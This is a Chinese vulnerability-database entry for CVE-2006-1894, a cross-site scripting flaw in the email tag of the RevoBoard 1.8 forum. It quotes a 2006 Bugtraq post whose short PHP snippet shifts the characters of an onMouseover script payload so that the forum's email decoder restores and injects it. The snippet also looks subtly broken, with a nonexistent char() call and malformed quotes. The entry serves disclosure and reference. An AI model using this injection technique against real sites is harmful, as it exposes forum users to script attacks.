RevoBoard 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195273 漏洞类型 跨站脚本
发布时间 2006-04-20 更新时间 2006-04-20
CVE编号 CVE-2006-1894 CNNVD-ID CNNVD-200604-394
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/84007
https://cxsecurity.com/issue/WLB-2006040091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-394
|漏洞详情
RevoBoard1.8起源于PunBB,并且存在跨站脚本漏洞。这使得远程攻击者可以借助于电子邮件标记的代换密码注入任意Web脚本或HTML。当应用程序的电子邮件地址混编器进行逆向转换时,所述代换密码被转换。
|漏洞EXP
Revoboard (php) is based on an earlier version of PunBB.
I know for sure that this affects v1.8.

The email tag parser obsfucates emails to stop harvesters. To execute code, do this: 
[php]
$code = ''" onMouseover="javascript:alert(/xss/)">';
for($a=0;$a<strlen($code);$a++){
     $c = ord(substr($code,$a,1));
     $c += intval(-2);
     $str .= char($c);
}
print $str;
[/php]

And you just paste $str into the tag =).

r0xes

dynxss.whiteacid.org
criticalsecurity.net
|受影响的产品
Revoboard Revoboard 1.8
|参考资料

来源:BUGTRAQ
名称:20060413RevoBoard[email]tagXSS
链接:http://www.securityfocus.com/archive/1/archive/1/430886/100/0/threaded
来源:SREASON
名称:768
链接:http://securityreason.com/securityalert/768